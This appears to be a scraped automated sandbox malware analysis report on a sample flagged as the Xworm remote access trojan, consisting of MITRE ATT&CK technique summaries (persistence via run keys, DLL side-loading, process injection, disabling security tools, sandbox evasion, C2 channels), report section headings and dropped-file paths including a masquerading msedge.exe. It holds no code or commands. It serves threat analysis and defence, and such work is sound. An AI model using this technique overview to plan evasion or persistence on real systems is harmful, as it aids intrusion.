Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Spreading

Networking

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\msedge.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Runtime Broken Core.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\file.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41cymmgz.isb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4rfz1jl.hpl.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fskb4t0w.cck.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgdhokbz.iez.ps1

Windows Analysis Report
file.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre